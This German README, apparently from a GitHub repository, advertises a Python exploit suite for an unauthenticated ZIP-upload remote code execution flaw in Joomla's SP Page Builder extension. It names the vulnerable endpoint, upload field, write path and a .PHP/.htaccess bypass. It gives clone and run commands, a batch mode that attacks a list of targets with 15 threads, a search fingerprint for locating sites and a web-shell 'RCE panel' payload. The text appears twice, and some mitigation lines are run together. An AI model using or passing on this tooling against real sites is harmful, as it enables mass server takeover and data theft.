
Python-Exploit-Suite für CVE-2026-48908, eine unauthentifizierte ZIP-Upload-RCE in Joomla SP Page Builder (<=6.6.1), mit Fingerprinting, Batch-Modus und einer RCE-Panel-Payload.
SP Page Builder (Joomla) — Nicht authentifizierter ZIP-Upload → RCE
| Produkt | SP Page Builder — com_sppagebuilder (JoomShaper) |
| Version | ≤ 6.6.1 |
| Behoben | 6.6.2+ — Upload erfordert jetzt Admin |
| Auth | Nicht authentifiziert |
| Vektor | POST …&task=asset.uploadCustomIcon |
| Feld | custom_icon (Icon-Font-ZIP) |
| Schreibpfad | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| Bypass | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/ deaktivieren.htaccess blockierencustom_icon-ZIP-Uploadsgit clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| Datei | Aufgabe |
|---|---|
winrarzips_brand.py | CMD-Banner (by winrarzips) |
sppb48908_core.py | Exploit-Engine |
CVE-2026-48908-Suite.py | Batch- + Einzelziel-CLI |
CVE-2026-48908.py | Einzelziel-Wrapper |
payloads/x7-panel.php | RCE-Panel |
requirements.txt | Abhängigkeiten |
❌ Ziellisten, Scan-Ergebnisse und Panel-URLs sind nicht im Repo enthalten.
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed
SP Page Builder (Joomla) — Nicht authentifizierter ZIP-Upload → RCE
| Produkt | SP Page Builder — com_sppagebuilder (JoomShaper) |
| Betroffen | ≤ 6.6.1 |
| Behoben | 6.6.2+ — Upload erfordert Admin |
| Auth | Nicht authentifiziert |
| Vektor | POST …&task=asset.uploadCustomIcon |
| Feld | custom_icon (Icon-Font-ZIP) |
| Schreibpfad | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| Bypass | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/ deaktivieren.htaccess-PHP-Registrierung blockierencustom_icon-ZIP-Uploadsgit clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| Datei | Rolle |
|---|---|
winrarzips_brand.py | CMD-Banner (by winrarzips) |
sppb48908_core.py | Exploit-Kern |
CVE-2026-48908-Suite.py | Batch- + Einzelziel-CLI |
CVE-2026-48908.py | Einzelziel-Wrapper |
payloads/x7-panel.php | RCE-Panel-Payload |
requirements.txt | Abhängigkeiten |
❌ Ziellisten, Scan-Ergebnisse und Live-Panel-URLs sind nicht enthalten.
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed